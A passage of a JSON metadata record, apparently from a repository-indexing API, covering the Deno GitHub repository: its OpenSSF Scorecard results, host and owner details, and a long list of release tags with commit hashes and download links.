https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5